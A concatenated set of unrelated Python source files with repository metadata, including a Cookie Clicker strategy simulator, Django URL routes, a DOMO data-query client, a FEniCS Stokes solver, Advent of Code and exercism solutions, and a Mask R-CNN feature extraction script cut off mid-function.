def time_until(self, cookies):
"""
Return time until you have the given number of cookies
(could be 0.0 if you already have enough cookies)
Should return a float with no fractional part
"""
reqd_time = 0.0
current_cookies = self.get_cookies()
if current_cookies < cookies:
cookies_needed = cookies - self.get_cookies()
reqd_time = ceil((cookies_needed) / self.get_cps())
return reqd_time
def wait(self, time):
"""
Wait for given amount of time and update state
Should do nothing if time <= 0.0
"""
if time > 0:
self._current_time += time
cookies_produced = time * self._current_cps
self._current_cookies += cookies_produced
self._total_cookies += cookies_produced
def buy_item(self, item_name, cost, additional_cps):
"""
Buy an item and update state
Should do nothing if you cannot afford the item
"""
if self._current_cookies >= cost:
self._current_cookies -= cost
self._current_cps += additional_cps
self._history.append((self._current_time, item_name, cost, self._total_cookies))
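# Illustrative sketch of how the ClickerState methods compose (the cost/cps
# numbers below are made up, not taken from the provided build info):
#   state = ClickerState()
#   state.wait(state.time_until(15.0))   # idle until 15 cookies are banked
#   state.buy_item("Cursor", 15.0, 0.1)  # then spend them on an upgrade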
def simulate_clicker(build_info, duration, strategy):
"""
Function to run a Cookie Clicker game for the given
duration with the given strategy. Returns a ClickerState
object corresponding to the final state of the game.
"""
# Replace with your code
build = build_info.clone()
state = ClickerState()
while state.get_time() <= duration:
cookies = state.get_cookies()
cps = state.get_cps()
history = state.get_history()
time_left = duration - state.get_time()
item = strategy(cookies, cps, history, time_left, build)
if item is None:
state.wait(time_left)
break
cost, additional_cps = build.get_cost(item), build.get_cps(item)
required_time = state.time_until(cost)
if required_time > time_left:
state.wait(time_left)
break
state.wait(required_time)
state.buy_item(item, cost, additional_cps)
build.update_item(item)
return state
#run_suite(ClickerState)
def strategy_cursor_broken(cookies, cps, history, time_left, build_info):
"""
Always pick Cursor!
Note that this simplistic (and broken) strategy does not properly
check whether it can actually buy a Cursor in the time left. Your
simulate_clicker function must be able to deal with such broken
strategies. Further, your strategy functions must correctly check
if you can buy the item in the time left and return None if you
can't.
"""
return "Cursor"
def strategy_none(cookies, cps, history, time_left, build_info):
"""
Always return None
This is a pointless strategy that will never buy anything, but
that you can use to help debug your simulate_clicker function.
"""
return None
def item_costs(build_info):
""" gets the costs of the upgrades"""
items = build_info.build_items()
cost = build_info.get_cost
items = [(cost(item), item) for item in items]
items = sorted(items)
return items
def item_cps(build_info):
""" gets the costs of the upgrades"""
items = build_info.build_items()
getcps = build_info.get_cps
cost = build_info.get_cost
items = [(getcps(item), cost(item), item) for item in items]
items = sorted(items)
return items
def get_cheapest_item(build_info):
""" returns the cheapest item"""
items = item_costs(build_info)
return items[0]
def get_lowcps_item(build_info):
"""return teh lowest cps item"""
items = item_cps(build_info)
return items[0]
def get_costly_item(build_info):
    """ returns the most expensive item"""
    items = item_costs(build_info)
    return items[-1]
def get_bigcps_item(build_info):
    """return the highest cps item"""
    items = item_cps(build_info)
    return items[-1]
def strategy_cheap(cookies, cps, history, time_left, build_info):
"""
Always buy the cheapest item you can afford in the time left.
"""
cheapest_item_cost, cheapest_item = get_cheapest_item(build_info)
max_possible = cookies + time_left * cps
if max_possible < cheapest_item_cost:
item = None
else:
item = cheapest_item
return item
def strategy_expensive(cookies, cps, history, time_left, build_info):
"""
Always buy the most expensive item you can afford in the time left.
"""
items = item_costs(build_info)
max_possible = cookies + time_left * cps
items = [item for item in items if item[0] <= max_possible]
    if len(items) == 0:
item = None
else:
item = items[-1][1]
return item
def strategy_best_a(cookies, cps, history, time_left, build_info):
"""
The best strategy that you are able to implement.
"""
last_purch_item = history[-1][1]
max_possible = cookies + time_left * cps
items = item_costs(build_info)
items = [itema[1] for itema in items if itema[0] <= max_possible]
    if last_purch_item is None or last_purch_item not in items:
item = strategy_cheap(cookies, cps, history, time_left, build_info)
return item
if last_purch_item in items :
index = items.index(last_purch_item)
if index == len(items) - 1:
item = last_purch_item
return item
cost_next_item = build_info.get_cost(items[index+1])
cost_item = build_info.get_cost(last_purch_item)
if cost_item < (0.86 * cost_next_item):
item = last_purch_item
else:
item = items[index+1]
return item
from random import choice
def strategy_best(cookies, cps, history, time_left, build_info):
"""
The best strategy that you are able to implement.
"""
    total_possible = cookies + cps * time_left  # upper bound on cookies; test_option recomputes it below
def cost_per_cps_ratio(item):
item_cps = build_info.get_cps(item)
item_cost = build_info.get_cost(item)
ratio = item_cost / item_cps
return ratio
def test_option(item):
cost = build_info.get_cost(item)
max_cookies = cookies + cps * time_left
return cost <= max_cookies
options = [(cost_per_cps_ratio(item), item) for item in build_info.build_items() if test_option(item)]
if len(options) == 0:
return None
return min(options)[1]
#run_suite(simulate_clicker, strategy_expensive)
def run_strategy(strategy_name, time, strategy):
"""
Run a simulation for the given time with one strategy.
"""
state = simulate_clicker(provided.BuildInfo(), time, strategy)
    print(strategy_name, ":", state)
#his = state._history
#for item in his:
# print 'time , item , cost, totalcook'
# print item
# Plot total cookies over time
# Uncomment out the lines below to see a plot of total cookies vs. time
# Be sure to allow popups, if you do want to see it
# history = state.get_history()
# history = [(item[0], item[3]) for item in history]
# simpleplot.plot_lines(strategy_name, 1000, 400, 'Time', 'Total Cookies', [history], True)
def run():
"""
Run the simulator.
"""
#run_strategy("Cursor", SIM_TIME, strategy_cursor_broken)
# Add calls to run_strategy to run additional strategies
#run_strategy("Cheap", SIM_TIME, strategy_cheap)
#run_strategy("Expensive", SIM_TIME, strategy_expensive)
run_strategy("Best", SIM_TIME, strategy_best)
#run_strategy("Best", SIM_TIME, strategy_best_a)
run()
| [
"[email protected]"
] | |
13aaaee148414fb08769b258edea12d0a8b27cda | 8c2f5e25e3b4fc1ab6a39b954cefba54121db2f4 | /Cricket_pro/urls.py | 517b2f1cca22b4ecaad51bff8d543c8e6e1ee6fb | [] | no_license | gopal8688/cricket_assignment | 8d065feb2b9ddcd07debd2ae259aec0e08fe3ccb | 8bd52df4cd3e6aa59fc1bd3aed916fd337ab7fac | refs/heads/master | 2022-11-15T18:05:44.249388 | 2020-07-04T11:24:08 | 2020-07-04T11:24:08 | 277,095,753 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,328 | py | """cricket_team URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from Cricket_pro import settings
from django.conf.urls.static import static
from cricket_app import views
from django.views.generic import TemplateView
urlpatterns = [
path('admin/', admin.site.urls),
path('team/', views.Show_Team.as_view(), name='team'),
path('player/', views.Show_palyer.as_view(), name='player'),
path('match/', views.Match.as_view(), name='match'),
path('points/', views.Show_Points.as_view(), name='points'),
path('', TemplateView.as_view(template_name='home.html'),name='home'),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"[email protected]"
] | |
c5e2cd700543d8067f8c110dadae755ae3ea69a4 | d99b6737585bc25cbd85870a75859adff0f728d0 | /ICP6/venv/Scripts/easy_install-3.7-script.py | 32c9c58b93a1a8400889eb2c53e26dafb4c07863 | [] | no_license | RupeshDoddala/Python | 04e9e8eba30d99bd3da477dba6a16f135c0eb212 | 37f5a9e7c6128162f56894528611033eccd527c6 | refs/heads/master | 2020-04-18T16:14:03.356609 | 2019-05-03T22:53:12 | 2019-05-03T22:53:12 | 167,629,462 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | #!C:\Users\RupeshD\PycharmProjects\ICP6\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.7')()
)
| [
"[email protected]"
] | |
fa4b4047e1713b9e279672112999c91f38a555be | fde31c7067082b6340154bece06acbb8793124f7 | /cricket/cricscore/abc.py | 8d1a78173971101d9d54f95add2052d566962d90 | [] | no_license | nikkkkhil/Cricket-Web-App | 1b245d77b0b845b17777bba512f458c92805fecf | bc28990fc30d4594b115884aa1dd323d01274322 | refs/heads/master | 2022-12-18T16:04:23.914205 | 2019-05-26T14:20:22 | 2019-05-26T14:20:22 | 134,660,557 | 4 | 0 | null | 2022-12-08T00:57:52 | 2018-05-24T04:22:49 | HTML | UTF-8 | Python | false | false | 1,007 | py | import re
import pytz
import requests
import datetime
from bs4 import BeautifulSoup
from espncricinfo.exceptions import MatchNotFoundError, NoScorecardError
from espncricinfo.match import Match
bigbash_article_link = "http://www.espncricinfo.com/ci/content/series/1128817.html?template=fixtures"
r = requests.get(bigbash_article_link)
bigbash_article_html = r.text
soup = BeautifulSoup(bigbash_article_html, "html.parser")
bigbash1_items = soup.find_all("span",{"class": "fixture_date"})
bigbash_items = soup.find_all("span",{"class": "play_team"})
bigbash_article_dict = {}
date_dict = {}
# for div in bigbash_items:
# a = div.find('a')['href']
# bigbash_article_dict[div.find('a').string] = a
# #print(bigbash_article_dict)
i = 0
s = ""  # text of the most recent even-numbered fixture_date span
x = ""  # text of the most recent odd-numbered fixture_date span
date = []
match = []
for div in bigbash1_items:
    i += 1
    if i % 2 == 0:
        s = div.string.strip("\xa0local\n\r\t")
    elif i % 2 != 0:
        x = div.string.strip("\xa0local\n\r\t")
    print(s)
#print(bigbash_article_dict)
#date_dict[div.find('span').string] = a
| [
"[email protected]"
] | |
253ae191cd0f7b4a9542a3e4dbf7368054f1663f | 9d71864d602e986abd6e3d2aaeee04a5895826ef | /models/user.py | 0fb800f5ec637c749120cd5b0b56a342281b0f68 | [] | no_license | aquashash/Flask-RESTAPI | 52a31f626f4e6be60252b98b942324a1931f9e3a | 41ddb2852eb6e407e6cb8bd787d368187ea5a5b9 | refs/heads/master | 2020-03-19T08:35:03.282892 | 2018-06-11T21:11:06 | 2018-06-11T21:11:06 | 136,217,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | from db import db
class UserModel(db.Model):
__tablename__ ='users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80))
password = db.Column(db.String(80))
def __init__(self, username, password):
self.username = username
self.password = password
@classmethod
def find_by_username(cls, username):
return cls.query.filter_by(username=username).first()
@classmethod
def find_by_id(cls, _id):
return cls.query.filter_by(id=_id).first()
def save_to_db(self):
db.session.add(self)
db.session.commit() | [
"[email protected]"
] | |
71fafd03f6f060dcac59aadfa5d2a031fe0e6ee8 | c040b64e299e3455eb066531e75266a47045ef34 | /nn/my_keras/pic_martix.py | 3b21ce71164036aaecb7527205953db66fbaf1e7 | [] | no_license | helloexp/ml | f0e67d0360ae4860b289247db3c0a902566f088c | c3e96ae948759eaa6011041b6d5281a1e9073959 | refs/heads/master | 2020-04-16T18:22:39.498282 | 2018-12-20T10:31:27 | 2018-12-20T10:31:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 569 | py | # encoding:utf-8
from PIL import Image
from pylab import *
class ImageOperation(object):
def __init__(self,size):
self.size=size
def array_2_image(self,data):
image = Image.fromarray(data)
return image
def image_2_array(self,filename):
image = Image.open(filename)
return array(image)
if __name__ == '__main__':
operation = ImageOperation((128,128))
array = operation.image_2_array("../resource/cat.jpeg")
print(array)
image = operation.array_2_image(array)
image.show()
show() | [
"[email protected]"
] | |
2f75d64a1469c372ddd1d7953bca677b0823bc49 | 6ff2a44be083550c5c96aa4637c338cad672b8fd | /05_알고리즘/190905/숫자배열회전.py | cd30fd8b712bc33aee670dc484db357677fdcbd4 | [] | no_license | hyunhee418/TIL | 447ed9735b3cf8f8c68a985248aefb80ee415f5c | cac85a9207ae03cb7f4b060b5d0b79e55ca78c19 | refs/heads/master | 2023-01-10T15:20:49.841630 | 2021-01-05T10:41:05 | 2021-01-05T10:41:05 | 195,916,255 | 0 | 0 | null | 2023-01-05T05:00:18 | 2019-07-09T02:17:47 | Jupyter Notebook | UTF-8 | Python | false | false | 489 | py | import sys
sys.stdin = open('input_ro.txt', 'r')
for tc in range(1, int(input())+1):
N = int(input())
arr = [list(map(int, input().split())) for _ in range(N)]
d1 = []
for i in range(N):
for s in range(N-1, -1, -1):
print(arr[s][i], end='')
print(end=' ')
for j in range(N - 1, -1, -1):
print(arr[N-i-1][j], end='')
print(end=' ')
for h in range(N):
print(arr[h][N-i-1], end='')
print() | [
"[email protected]"
] | |
2523cadd05a1cb3f943dcfbff1e4624cd49663e4 | ea9c6173d17a366a925d0339c0ed97350dc479ac | /griot/griot/__init__.py | 13f21637e745569ddcb097a778582a8cfc87cd87 | [
"MIT"
] | permissive | JeffreyMFarley/Bailiwick | 039263a23de095ca920161d9a9a2be71bcaf5261 | 0533b2398aaaa69c15c7d6b8a50290d92513fbbf | refs/heads/main | 2021-07-01T02:14:35.241835 | 2019-11-16T19:00:16 | 2019-11-16T19:00:16 | 98,752,948 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | from griot.compile import *
from griot.fine_tune import *
from griot.enrich import *
from griot.lemma_inflections import *
from griot.participle import *
| [
"[email protected]"
] | |
e6cd52859f6674708efc0f38b3e0b4f2a9a9150b | ac8d43147308180531cc1d9757378b65c0db59c9 | /domo_query/__init__.py | d499044cc865a41b68b0670f897af164538c8326 | [] | no_license | JediHero/domo-query | 4867954d2b6f023e8f024c92c9199713a4a24fb6 | 98d2556286361a7c34a019d68fe086dbb0e859a3 | refs/heads/master | 2022-04-05T22:01:50.866997 | 2020-03-06T01:08:43 | 2020-03-06T01:08:43 | 243,444,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,702 | py | """Provides a Connection class with a tables property providing metadata for datasets
where the user's credentials have share permissions or the user is marked as the owner.
Also provides a query method used to pull/export data from DOMO.
"""
__version__ = '0.1.0'
# Standard library
import dataclasses as dc
import typing as tp
# 3rd party
import requests
@dc.dataclass
class Connection:
"""Interface for the domo_query package. The Connection object is lazy meaning
that properties are populated on their first use.
This library requires a 'Client' to be created at developer.domo.com.
1. Go to developer.domo.com.
2. Sign into your domain.
3. Under My Account select New Client.
4. Scope must be data.
The 'Client ID' and 'Secret' are required parameters when instantiating the Connection class.
Once the class is instantiated, properties are calculated as they are used.
conn = Connection(YOUR_CLIENT_ID, YOUR_SECRET)
conn.tables returns a list of dict objects where each dict contains an 'id' and 'name' key.
The 'id' or 'name' can be used to run queries.
    The sql parameter of the 'query' method always selects from the 'table' table.
For example, 'select * from table' is the default query provided if sql=''.
Results can be limited by passing 'select * from table limit 10'.
Columns and rows can be specified using normal sql select and where clauses.
"""
client_id: str
secret: str
auth_url: str=dc.field(init=False, default="https://api.domo.com/oauth/token?grant_type=client_credentials&scope=data")
query_url: str=dc.field(init=False, default="https://api.domo.com/v1/datasets")
_login: dict=dc.field(init=False, default_factory=dict)
_tables: tp.List[tp.Dict]=dc.field(init=False, default_factory=list)
_last_id_or_name: str=dc.field(init=False, default="")
@property
def login(self) -> tp.Dict:
"""Returns the Authorization header specified in the DOMO API."""
if self._login:
return self._login
auth = requests.auth.HTTPBasicAuth(self.client_id, self.secret)
# authenticate
response = requests.get(self.auth_url, auth=auth)
# get token and return basic header
token = response.json()["access_token"]
header = dict(Authorization = f"bearer {token}")
self._login = header
return self._login
@property
def tables(self) -> tp.List[tp.Dict]:
"""Return a list of datasets in the domain. Each item in the list contains
metadata about the dataset such as name, owner, rows, columns, etc. The login
used to create the 'Client ID' and 'Secret' must have share permissions or be the owner
of the datasets returned.
"""
if self._tables:
return self._tables
header = self.login # authenticate
        limit = 50 # batch size fetched on each loop
offset = 0 # set state variable
datasets = [] # holds metadata for datasets
# requests datasets in groups of limit
while True:
# set url
url = f"{self.query_url}?offset={offset}&limit={limit}"
# get next group of datasets
chunk = requests.get(url, headers=header).json()
if not chunk: break
# append chunk to master list
datasets.extend(chunk)
# increment state
offset += limit
self._tables = datasets
return self._tables
def find_table(self, id_or_name: str) -> str:
"""Takes the name or id of the DOMO dataset and returns metadata for the
matching dataset. This method is used to obtain the id_or_name parameter in the
'query' method.
"""
for table in self.tables:
if table["name"] == id_or_name:
self._last_id_or_name = table
return self._last_id_or_name
elif table["id"] == id_or_name:
self._last_id_or_name = table
return self._last_id_or_name
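    # Minimal usage sketch (an addition; the client id/secret are placeholders
    # created at developer.domo.com, and "Sales" is a hypothetical dataset name):
    #   conn = Connection("YOUR_CLIENT_ID", "YOUR_SECRET")
    #   conn.find_table("Sales")
    #   rows = conn.query("select * from table limit 5")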
def query(self, sql: str="", id_or_name: str="") -> tp.List[dict]:
"""Returns the results of a query on a DOMO dataset. The results are
formatted as a list of dict objects where each record is a dict where
keys are columns.
1. If id_or_name is not provided, the last id_or_name value is used.
2. If the query method has never been useed, the id_or_name must be passed.
This value can be
obtained using the find_table method.
3. If 'sql' is not provided the default will be 'select * from table'.
All 'sql' statements must select from the 'table' table.
"""
# authenticate
header = self.login
# add json type
header['Accept'] = 'application/json'
# create params
sql = sql or "select * from table"
        if id_or_name:
            self.find_table(id_or_name)
        if not self._last_id_or_name:
            raise ValueError("Must provide Dataset ID or Name.")
        dataset_id = self._last_id_or_name["id"]
        query = {"sql": sql}
        url = f"{self.query_url}/query/execute/{dataset_id}?includeHeaders=true"
# get query results
response = requests.post(
url,
headers=header,
json=query
).json()
# format result as a list of dicts
columns = response["columns"]
rows = response["rows"]
data = [
dict(zip(columns, row))
for row in rows
]
return data | [
"[email protected]"
] | |
df0dfd2a32259bbda334dd63b38dccfdae71d234 | 968bef5b48bbef32f8193ec727e1d03f9a5b7f2c | /PyOpdb/NCBI_API/url.py | c3bf70470635b24af00438b6cfe214c8a857a068 | [
"Apache-2.0"
] | permissive | felixlyd/OPDB | fa015c5e8f11b07d954baee7477ad14b2150d808 | d5d9c9ce5239037dcc57abba6377abbfccec32d1 | refs/heads/master | 2021-08-08T21:42:40.687918 | 2017-11-11T09:59:13 | 2017-11-11T09:59:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 699 | py | import urllib.request
def connect_url(url, decode):
"""
    :method: a thin convenience wrapper around urllib.request.urlopen()
:param url: string
:param decode: string like "utf-8"
:return: string(the url content)
"""
req = urllib.request.Request(url)
response = urllib.request.urlopen(req)
html = response.read()
html = html.decode(decode)
return html
def callback(block, block_size, total_size):
"""
    :method: prints download progress; signature matches urllib's reporthook
:param block:
:param block_size:
:param total_size:
:return:
"""
percent = 100.0 * block * block_size / total_size
if percent > 100:
percent = 100
print("%.2f%%" % percent)
| [
"[email protected]"
] | |
9d9d3c3fe04320ef1567b9e330e2d820c0821128 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/kindergarten-garden/db2bf8388b6a4719a608a3d1a55324fe.py | b8ddc9ee8420f927cdf2119620fcf6bacdaaef8f | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 1,034 | py | _default_students = tuple(sorted(('Alice', 'Bob', 'Charlie',
'David', 'Eve', 'Fred',
'Ginny', 'Harriet', 'Ileana',
'Joseph', 'Kincaid', 'Larry')))
_plant_dict = {'C': 'Clover', 'G': 'Grass', 'R': 'Radishes', 'V': 'Violets'}
def _letter_to_plant(c):
return _plant_dict[c]
class Garden():
def __init__(self, plant_rows, students=None):
self.plant_rows = ''.join(c for c in plant_rows
if c in _plant_dict.keys() or c == '\n')
try:
self.students = tuple(sorted(students))
except TypeError:
self.students = _default_students
def plants(self, child):
plant_index = 2 * self.students.index(child)
plant_rows = [map(_letter_to_plant,
line[plant_index:plant_index + 2])
for line in self.plant_rows.split('\n')]
return list(plant for row in plant_rows for plant in row)
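# Usage sketch (an addition mirroring the exercism exercise's examples):
#   Garden("VC\nRC").plants("Alice") -> ['Violets', 'Clover', 'Radishes', 'Clover']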
| [
"[email protected]"
] | |
b1b6b6d014c0760a3d03c521469bd08581b22e5c | 6a07e15db24f819c1001409eb35b1813438f506c | /fem.py | 98e900b145c15514e36bad0ec1dcefd8dff362ef | [
"MIT"
] | permissive | domischi/StokesFEM | 62005812402768be320c961d2ef879591ad64eac | 3925e23253ac6d2c0444fb4b09f8f9176d4eaa44 | refs/heads/master | 2021-04-02T19:02:20.751323 | 2020-09-04T00:36:31 | 2020-09-04T00:36:31 | 248,309,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,050 | py | from dolfin import *
def left_right (x, on_boundary, L): return x[0] > L * (1-DOLFIN_EPS) or x[0] < L * (-1+DOLFIN_EPS)
def top_bottom (x, on_boundary, L): return x[1] > L * (1-DOLFIN_EPS) or x[1] < L * (-1+DOLFIN_EPS)
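# (The two helpers above flag points on the x = +/-L and y = +/-L walls of the
# [-L, L] x [-L, L] domain, up to DOLFIN_EPS tolerance; the `on_boundary`
# argument is accepted but unused.)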
def get_function_space(_config, mesh):
# Build function space
P2 = VectorElement("Lagrange", mesh.ufl_cell(), _config['degree_fem_velocity']) ## For the velocity
P1 = FiniteElement("Lagrange", mesh.ufl_cell(), _config['degree_fem_pressure']) ## For the pressure
TH = P2 * P1 ## Taylor-Hood elements
return FunctionSpace(mesh, TH) ## on the mesh
def get_general_bcs(_config, W):
bcs = []
L = _config['L']
# No-slip boundary conditions
if _config['no_slip_top_bottom']:
noslip = Constant((0.0, 0.0))
bcs.append(DirichletBC(W.sub(0), noslip, lambda x, on_boundary: top_bottom(x, on_boundary, L)))
if _config['no_slip_left_right']:
noslip = Constant((0.0, 0.0))
bcs.append(DirichletBC(W.sub(0), noslip, lambda x, on_boundary: left_right(x, on_boundary, L)))
# No penetration into wall
if (not _config['no_slip_top_bottom']) and _config['no_penetration_top_bottom']:
bcs.append(DirichletBC(W.sub(0).sub(1), Constant(0.), lambda x, on_boundary: top_bottom(x, on_boundary, L)))
if (not _config['no_slip_left_right']) and _config['no_penetration_left_right']:
bcs.append(DirichletBC(W.sub(0).sub(0), Constant(0.), lambda x, on_boundary: left_right(x, on_boundary, L)))
return bcs
def solve_stokes(_config, assemble_system):
mesh, W, A, P, bb = assemble_system(_config)
# Create Krylov solver and AMG preconditioner
solver = KrylovSolver(_config['krylov_method'], "amg")
solver.parameters.update( { 'absolute_tolerance' : 1e-9, 'relative_tolerance' : 1e-9, 'maximum_iterations' : 1000, })
# Associate operator (A) and preconditioner matrix (P)
solver.set_operators(A, P)
# Solve
U = Function(W)
solver.solve(U.vector(), bb)
# Get sub-functions
u, p = U.split()
return u, p, mesh
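# Hedged usage sketch (an addition): the config keys below are the ones this
# module reads, but the values are illustrative, and `my_assemble_system`
# stands in for a user-supplied function returning (mesh, W, A, P, bb) in the
# order solve_stokes unpacks them.
#   _config = {'L': 1.0, 'degree_fem_velocity': 2, 'degree_fem_pressure': 1,
#              'no_slip_top_bottom': True, 'no_slip_left_right': False,
#              'no_penetration_top_bottom': True, 'no_penetration_left_right': True,
#              'krylov_method': 'minres'}
#   u, p, mesh = solve_stokes(_config, my_assemble_system)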
| [
"[email protected]"
] | |
b72172fdca7b5d967c5302c25916cae83caff034 | 181594187b476f0c24ced2ee1256f1ccc20b5edd | /Day4/sleep.py | 3d6cdc72a3c02954dc048be092e9479eaf338c18 | [] | no_license | Negative-Feedback/AOC_2018 | 10ebc371cbc62fd923721f75036e14b8950aac51 | ba5053a062863409f8ab4babfacb553e783588d0 | refs/heads/master | 2020-04-26T00:19:29.726118 | 2019-03-18T15:01:44 | 2019-03-18T15:01:44 | 173,173,737 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,283 | py | import re
# function to calculate the total time spent asleep
def calcSleepTime(minutes):
total = 0
for x in minutes:
total += x
return total
# function to calculate the minute they were asleep on the most
def calcSleepMin(minutes):
bMin = -1
for i in range(len(minutes)):
if bMin == -1:
bMin = i
elif minutes[bMin] <= minutes[i]:
bMin = i
return bMin
# function to find the guard who is asleep the most and the minute they are asleep on the most
def part_one(arr, ids):
bestID = -1
bestMin = -1
sleepTime = -1
corrID = False
for id in ids: # loop through the array of ids
        minutes = [0 for x in range(0, 60)] # guards are only asleep between 00:00 - 00:59 so this array represents the minutes
        # regex to identify the correct entries
query = re.compile("^Guard #" + str(id) + " begins shift$")
for i in range(len(arr)): # loop through the array of entries
if query.search(arr[i][1]):
corrID = True
elif re.search("falls asleep", arr[i][1]) and corrID:
                # stripping the minutes out of the entries
start = int(str(arr[i][0])[14:16])
end = int(str(arr[i+1][0])[14:16])
for i in range(start,end): #increment the minutes they are asleep
minutes[i] +=1
else:
corrID = False
testSleepTime = calcSleepTime(minutes) # calculate the total time spent asleep
if bestID == -1 and bestMin == -1:
sleepTime = testSleepTime
bestID = id
bestMin = calcSleepMin(minutes)
elif sleepTime < testSleepTime:
sleepTime = testSleepTime
bestID = id
bestMin = calcSleepMin(minutes)
print("ID: {} Minute: {} Sleep Time: {}".format(bestID, bestMin, sleepTime))
# function to find the guard who is asleep most often on the same minute
def part_two(arr, ids):
bestID = -1
bestMin = -1
numTimes = -1
corrID = False
for id in ids: # loop through the array of ids
        minutes = [0 for x in range(0, 60)] # guards are only asleep between 00:00 - 00:59 so this array represents the minutes
        # regex to identify the correct entries
query = re.compile("^Guard #" + str(id) + " begins shift$")
for i in range(len(arr)): # loop through the array of entries
if query.search(arr[i][1]):
corrID = True
elif re.search("falls asleep", arr[i][1]) and corrID:
                # stripping the minutes out of the entries
start = int(str(arr[i][0])[14:16])
end = int(str(arr[i+1][0])[14:16])
                for i in range(start, end): # increment the minutes they are asleep (waking minute excluded, matching part_one)
minutes[i] +=1
else:
corrID = False
BMin = calcSleepMin(minutes)
NTime = minutes[BMin]
if bestID == -1 and bestMin == -1 and numTimes == -1:
bestID = id
bestMin = BMin
numTimes = NTime
elif numTimes < NTime:
bestID = id
bestMin = BMin
numTimes = NTime
print("ID: {} Minute: {} Num Times: {}".format(bestID, bestMin, numTimes)) | [
"[email protected]"
] | |
e4ac7949001c3a782ee66c9e353af4d7b37f1de9 | b2e4f2a9d8fabf3f667dfc2141e96af1f342f5b2 | /tools/extract_mrcn_ref_feats.py | fdb39c7217d3bf71e20243759435578adab89a23 | [
"MIT"
] | permissive | ChopinSharp/MAttNet | ba927d80f15c0b99105540d40809cad2f08d36d4 | 3d82fe08ad5526665d0478aee08c5113d79cc209 | refs/heads/master | 2021-08-08T05:48:01.993261 | 2020-08-11T04:58:12 | 2020-08-11T04:58:12 | 227,971,922 | 1 | 1 | MIT | 2019-12-14T05:35:02 | 2019-12-14T05:35:01 | null | UTF-8 | Python | false | false | 4,508 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import os.path as osp
import sys
import json
import time
import numpy as np
import h5py
import pprint
from scipy.misc import imread, imresize
import cv2
import torch
from torch.autograd import Variable
# mrcn path
import _init_paths
from mrcn import inference_no_imdb
# dataloader
# HERE
from loaders.ref_loader import RefLoader
# box functions
def xywh_to_xyxy(boxes):
"""Convert [x y w h] box format to [x1 y1 x2 y2] format."""
return np.hstack((boxes[:, 0:2], boxes[:, 0:2] + boxes[:, 2:4] - 1))
def xyxy_to_xywh(boxes):
"""Convert [x1 y1 x2 y2] box format to [x y w h] format."""
return np.hstack((boxes[:, 0:2], boxes[:, 2:4] - boxes[:, 0:2] + 1))
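# Quick illustration (an addition, not part of the original pipeline): the two
# conversions above are inverses of each other, e.g.
#   xywh_to_xyxy(np.array([[10., 20., 5., 5.]]))   -> [[10., 20., 14., 24.]]
#   xyxy_to_xywh(np.array([[10., 20., 14., 24.]])) -> [[10., 20., 5., 5.]]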
def image_to_head(head_feats_dir, image_id):
"""Returns
head: float32 (1, 1024, H, W)
im_info: float32 [[im_h, im_w, im_scale]]
"""
feats_h5 = osp.join(head_feats_dir, str(image_id)+'.h5')
feats = h5py.File(feats_h5, 'r')
head, im_info = feats['head'], feats['im_info']
return np.array(head), np.array(im_info)
def det_to_pool5_fc7(mrcn, det, net_conv, im_info):
"""
Arguments:
det: object instance
net_conv: float32 (1, 1024, H, W)
im_info: float32 [[im_h, im_w, im_scale]]
Returns:
pool5: Variable (cuda) (1, 1024)
fc7 : Variable (cuda) (1, 2048)
"""
box = np.array([det['box']]) # [[xywh]]
box = xywh_to_xyxy(box) # [[x1y1x2y2]]
pool5, fc7 = mrcn.box_to_pool5_fc7(Variable(torch.from_numpy(net_conv).cuda()), im_info, box) # (1, 2048)
# fc7 = fc7.mean(3).mean(2)
return pool5, fc7
def main(args):
dataset_splitBy = args.dataset + '_' + args.splitBy
if not osp.isdir(osp.join('cache/feats/', dataset_splitBy)):
os.makedirs(osp.join('cache/feats/', dataset_splitBy))
# Image Directory
if 'coco' or 'combined' in dataset_splitBy:
IMAGE_DIR = 'data/images/mscoco/images/train2014'
elif 'clef' in dataset_splitBy:
IMAGE_DIR = 'data/images/saiapr_tc-12'
else:
print('No image directory prepared for ', args.dataset)
sys.exit(0)
# load dataset
data_json = osp.join('cache/prepro', dataset_splitBy, 'data.json')
data_h5 = osp.join('cache/prepro', dataset_splitBy, 'data.h5')
## HERE
id_str = '%s_%s_%s_%d' % (args.m, args.tid, dataset_splitBy, args.top_N)
dets_json = osp.join('cache/detections', dataset_splitBy, 'matt_dets_%s.json' % id_str)
loader = RefLoader(data_json, data_h5, dets_json)
images = loader.images
